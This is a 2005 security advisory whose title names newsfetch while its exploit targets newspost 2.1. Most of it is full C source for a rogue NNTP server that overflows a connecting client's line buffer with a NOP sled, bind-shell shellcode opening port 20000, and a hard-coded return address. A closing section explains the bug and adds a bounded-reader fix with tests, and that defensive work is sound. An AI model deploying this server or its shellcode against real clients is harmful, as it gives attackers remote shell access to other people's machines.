[EXPL] newsfetch Buffer Overflow Exploit

Subject: [EXPL] newsfetch Buffer Overflow Exploit
Date: 3 Feb 2005 18:27:22 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  newsfetch Buffer Overflow Exploit
------------------------------------------------------------------------


SUMMARY

 <http://www.securiteam.com/unixfocus/5RP050KEUK.html> newsfetch is "a 
powerful utility to fetch news from an NNTP server and store it in 
mailbox format. The files created by newsfetch can be used with any mail 
reader".

Due to poor handling of data received from the NNTP server, an attacker who 
controls or impersonates that server can cause the client to overflow an 
internal stack buffer. The following exploit code can be used to test your 
system for the mentioned vulnerability. Note that the exploit's own header 
names its target as newspost 2.1 and the overflowed function as 
socket_getline(): it is a rogue NNTP server, not a client. It listens on 
TCP port 119 (which needs root) and answers every connecting client with a 
single 1056-byte response that carries no line terminator, so it has to be 
running before the client is pointed at it. The hard-coded return address 
0xbfffecb8 matches one particular stack layout and will need adjusting for 
other builds and environments; a wrong guess crashes the client rather than 
yielding the bind shell on port 20000.

DETAILS

Exploit:
/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit
 
Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic <file>
 
Greetz fly to my girlfriend YASMIN H.
 
                                                    ?
                                                   ?M
                   M                              ?MMM
                   MMm                           ?MMMM
                   M$$MMm                       ?MMMMM.
                   MM$$MMMMm                   MMMMMMMM
                   `MM$$MMMMMMm               4MMMM$$MM
                    MMM$$MMMMMMMMm           ?MMMM$$MMM
                     MMM$$$MMMMMMMMm         mMMMM$MMMM
                      `MMM$$$MMMMMMMm        MMMM$MMMM?
                        MMMM$$$MMMMMMMm      MMM$$MMM?
                         `MMMMMMMMMMMMMm     MMMMMMM?
                           `MMMMMMMMMMMMMm   MMMMMM
                              `MMMMMMMMMMMM  MMMMM
                                 `MMMMMMMMMM MMMMM
                                    `MMMMMMMMMMMM
                                      MMMMMMMMMMM
                               mmMMMMMMMMMMMMMMMMM
                           mmMMMMMMMMMMMMMMMMMMMMMM
                          ?MMM#MMMMMMMMMMMMMMMMMMMMm
                        4MMM<  >MMMMMMMMMMMMMMMMMMMM
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
                      4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                        MMMMMMMMMMMMMMMMMMMMMMMMMMMM
       ?Mn               ?MMMMMMMMMMMMMMMMMMMMMMMMM            ?Mnn
       nM                  `MMMMMMMMMMMMMMMMMMMMMM?              n?
        `?                    MMMMMMMMMMMMMMMMM?                n?
                                     MMMMMM?
                                    mtr?
 
 
                                                     cybertronic 2oo5
 
                         just want to say love you dad!
*/
 
#include <stdio.h>
#include <stdlib.h>        /* exit(), system() */
#include <string.h>        /* memset(), memcpy(), strcat(), strncat(), strlen() */
#include <strings.h>       /* bzero() */
#include <signal.h>
#include <unistd.h>        /* fork(), close(), write(), sleep() */
#include <sys/types.h>
#include <sys/socket.h>    /* socket(), bind(), listen(), accept() */
#include <netinet/in.h>
#include <arpa/inet.h>     /* inet_ntoa() */
#include <netdb.h>
 
#define RED     "\E[31m\E[1m"
#define GREEN   "\E[32m\E[1m"
#define YELLOW  "\E[33m\E[1m"
#define BLUE    "\E[34m\E[1m"
#define NORMAL  "\E[m"
 
#define PORT    119
#define BACKLOG 5
 
// 92-byte Linux/x86 bind-shell shellcode: listens on TCP port 20000 (0x4e20),
// dup2()s the accepted socket over stdin/stdout/stderr and execve()s /bin//sh
char scode[] =
"\x31\xdb"                              // xor     ebx, ebx
"\xf7\xe3"                              // mul     ebx
"\xb0\x66"                              // mov     al, 102
"\x53"                                  // push    ebx
"\x43"                                  // inc     ebx
"\x53"                                  // push    ebx
"\x43"                                  // inc     ebx
"\x53"                                  // push    ebx
"\x89\xe1"                              // mov     ecx, esp
"\x4b"                                  // dec     ebx
"\xcd\x80"                              // int     80h
"\x89\xc7"                              // mov     edi, eax
"\x52"                                  // push    edx
"\x66\x68\x4e\x20"                      // push    word 8270
"\x43"                                  // inc     ebx
"\x66\x53"                              // push    bx
"\x89\xe1"                              // mov     ecx, esp
"\xb0\xef"                              // mov     al, 239
"\xf6\xd0"                              // not     al
"\x50"                                  // push    eax
"\x51"                                  // push    ecx
"\x57"                                  // push    edi
"\x89\xe1"                              // mov     ecx, esp
"\xb0\x66"                              // mov     al, 102
"\xcd\x80"                              // int     80h
"\xb0\x66"                              // mov     al, 102
"\x43"                                  // inc     ebx
"\x43"                                  // inc     ebx
"\xcd\x80"                              // int     80h
"\x50"                                  // push    eax
"\x50"                                  // push    eax
"\x57"                                  // push    edi
"\x89\xe1"                              // mov     ecx, esp
"\x43"                                  // inc     ebx
"\xb0\x66"                              // mov     al, 102
"\xcd\x80"                              // int     80h
"\x89\xd9"                              // mov     ecx, ebx
"\x89\xc3"                              // mov     ebx, eax
"\xb0\x3f"                              // mov     al, 63
"\x49"                                  // dec     ecx
"\xcd\x80"                              // int     80h
"\x41"                                  // inc     ecx
"\xe2\xf8"                              // loop    lp
"\x51"                                  // push    ecx
"\x68\x6e\x2f\x73\x68"                  // push    dword 68732f6eh
"\x68\x2f\x2f\x62\x69"                  // push    dword 69622f2fh
"\x89\xe3"                              // mov     ebx, esp
"\x51"                                  // push    ecx
"\x53"                                  // push    ebx
"\x89\xe1"                              // mov     ecx, esp
"\xb0\xf4"                              // mov     al, 244
"\xf6\xd0"                              // not     al
"\xcd\x80";                             // int     80h
 
void cmd ( int connfd );
void header ();
 
int
main ( int argc, char* argv[] )
{
        int listenfd, connfd;
        pid_t childpid;
        socklen_t clilen;
        struct sockaddr_in cliaddr, servaddr;

        ( void ) argc;
        ( void ) argv;                          /* the rogue server takes no arguments */

        header ();
        printf ( "[*] Creating socket..." );
        if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );
        bzero ( &servaddr, sizeof ( servaddr ) );
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
        servaddr.sin_port = htons ( PORT );     /* pose as the NNTP server */

        /* binding to 119 needs root (or CAP_NET_BIND_SERVICE), so check it */
        if ( bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ) == -1 )
        {
                printf ( RED "bind() FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( "[*] Listening..." );
        if ( listen ( listenfd, BACKLOG ) == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );

        for ( ; ; )
        {
                clilen = sizeof ( cliaddr );

                if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
                {
                        close ( listenfd );
                        exit ( 1 );
                }

                if ( ( childpid = fork ( ) ) == 0 )
                {
                        /* child: deliver the payload to this client, then quit */
                        close ( listenfd );
                        printf ( "[*]" GREEN " Incoming connection from:\t %s\n" NORMAL,
                                 inet_ntoa ( cliaddr.sin_addr ) );
                        cmd ( connfd );
                        close ( connfd );
                        exit ( 0 );
                }
                close ( connfd );               /* parent: keep accepting */
        }
        return 0;
}
 
void
cmd ( int s )
{
        char out[1200];
        unsigned long ret = 0xbfffecb8;         /* guessed stack address; adjust for the target */

        /* payload layout: 956 NOPs | 92-byte bind shellcode | "AAAA" (saved EBP) | return address
         * = 1056 bytes, sent without a trailing newline so socket_getline() never stops copying */
        bzero ( out, sizeof ( out ) );
        memset ( out, 0x90, 956 );
        memcpy ( out + 956, scode, sizeof ( scode ) );  /* sizeof includes the NUL that strcat() appends after */
        strcat ( out, "\x41\x41\x41\x41" );
        strncat ( out, ( char * ) &ret, 4 );    /* little-endian; 0xbfffecb8 contains no NUL byte */
        printf ( "[*] Sending Bad Packet [ %u bytes ]...", ( unsigned ) strlen ( out ) );
        if ( write ( s, out, strlen ( out ) ) <= 0 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );
        sleep ( 1 );                            /* let the client read the line before we close */
}
 
void
header ()
{
        system ( "clear" );
        printf ( RED "### " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  "
                 GREEN "### " YELLOW "###  " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n"
                 NORMAL );
        printf ( RED "#   " GREEN "# # " YELLOW "#  # " BLUE "#   " RED "#  # "
                 GREEN " #  " YELLOW "#  # " BLUE "# # " RED "##  # " GREEN "# " YELLOW "#\n"
                 NORMAL );
        printf ( RED "#   " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  "
                 GREEN " #  " YELLOW "###  " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#\n"
                 NORMAL );
        printf ( RED "#   " GREEN " #  " YELLOW "#  # " BLUE "#   " RED "# #  "
                 GREEN " #  " YELLOW "# #  " BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#\n"
                 NORMAL );
        printf ( RED "### " GREEN " #  " YELLOW "###  " BLUE "### " RED "#  # "
                 GREEN " #  " YELLOW "#  # " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n"
                 NORMAL );
        printf ( RED "                cybertronic@gmx.net\n" NORMAL );
        printf ( RED "                  ----------(c) 2005----------\n\n" NORMAL );

        printf ( "newspost-2.1\n\n" );
}
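The bug class behind this exploit is a line reader that copies bytes from the socket into a fixed-size stack buffer until it sees a newline, with no check on how many bytes have arrived. The rogue server above exploits exactly that: it answers the client with 1056 bytes and no line terminator, so the copy runs off the end of the buffer, through the saved frame pointer (the "AAAA") and into the return address (0xbfffecb8). The C below is an added example, not newspost's socket_getline() and not code from this advisory: it reconstructs that pattern next to a bounded reader that stops at the buffer size, drains the rest of an over-long line so the next read starts on the next line, and reports the truncation to the caller. The 1024-byte buffer size, the helper names, and the NNTP banner text are assumptions constructed for the example; a pipe stands in for the server socket so it runs offline.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define LINE_BUF     1024   /* assumed line-buffer size; not taken from newspost */
#define BAD_LINE_LEN 1056   /* the exploit's packet: 956 NOPs + 92 shellcode + 4 + 4 */

/* Constructed sample server greeting, not captured from a real NNTP server. */
static const char BANNER[] = "200 news.example.org InterNetNews NNRP server ready\n";

/* The vulnerable pattern (hypothetical reconstruction): copy into buf until
 * '\n', never checking the count. A reply longer than buf with no newline
 * writes past it, which is what the payload above relies on. */
int getline_unbounded(int fd, char *buf)
{
    size_t i = 0;
    char c;
    while (read(fd, &c, 1) == 1) {
        if (c == '\n')
            break;
        buf[i++] = c;               /* no bound: this is the overflow */
    }
    buf[i] = '\0';
    return (int)i;
}

/* Hardened reader: keeps at most bufsz-1 bytes, keeps consuming until the
 * newline (or EOF) so the stream stays in sync, and returns -1 when the
 * line did not fit, otherwise the line length. */
int getline_bounded(int fd, char *buf, size_t bufsz)
{
    size_t i = 0;
    int truncated = 0;
    char c;
    if (bufsz == 0)
        return -1;
    for (;;) {
        ssize_t n = read(fd, &c, 1);
        if (n == 0)
            break;                  /* EOF */
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (c == '\n')
            break;
        if (i < bufsz - 1)
            buf[i++] = c;
        else
            truncated = 1;          /* drop the byte, keep draining */
    }
    buf[i] = '\0';
    return truncated ? -1 : (int)i;
}

/* Preload a pipe with data and hand back its read end; stands in for the socket. */
int make_fd(const char *data, size_t len)
{
    int p[2];
    if (pipe(p) != 0)
        return -1;
    if (write(p[1], data, len) != (ssize_t)len) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    close(p[1]);
    return p[0];
}

/* Benign banner through each reader: both return its length, 51. The readers
 * are indistinguishable on well-formed input, which is why the bug survives. */
int banner_len_bounded(void)
{
    char buf[LINE_BUF];
    int fd = make_fd(BANNER, sizeof(BANNER) - 1);
    int n = getline_bounded(fd, buf, sizeof(buf));
    close(fd);
    return n;
}

int banner_len_unbounded(void)
{
    char buf[LINE_BUF];
    int fd = make_fd(BANNER, sizeof(BANNER) - 1);
    int n = getline_unbounded(fd, buf);
    close(fd);
    return n;
}

/* A 1056-byte line like the exploit's packet, then a normal line. Returns 1
 * if the bounded reader flagged the first line, kept exactly LINE_BUF-1 bytes,
 * and still read "205 bye" cleanly on the next call. */
int oversize_is_contained(void)
{
    static char data[BAD_LINE_LEN + 1 + 8];
    char buf[LINE_BUF];
    int fd, first, second;
    size_t kept;
    memset(data, 'A', BAD_LINE_LEN);
    data[BAD_LINE_LEN] = '\n';
    memcpy(data + BAD_LINE_LEN + 1, "205 bye\n", 8);
    fd = make_fd(data, sizeof(data));
    first = getline_bounded(fd, buf, sizeof(buf));
    kept = strlen(buf);
    second = getline_bounded(fd, buf, sizeof(buf));
    close(fd);
    return first == -1 && kept == LINE_BUF - 1 && second == 7 && strcmp(buf, "205 bye") == 0;
}

int main(void)
{
    printf("banner (bounded):   %d\n", banner_len_bounded());
    printf("banner (unbounded): %d\n", banner_len_unbounded());
    printf("oversize contained: %s\n", oversize_is_contained() ? "yes" : "no");
    return 0;
}
```

A caller that ignores the -1 would still act on a silently truncated line, so treat it as a protocol error and drop the connection. The same constructed input (one 1056-byte line with no terminator, then a normal line) is what you would feed a patched client to confirm the fix, since it is the shape of the packet the exploit sends.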


ADDITIONAL INFORMATION

The information has been provided by  <mailto:cybertronic@gmx.net> cyber 
tronic.



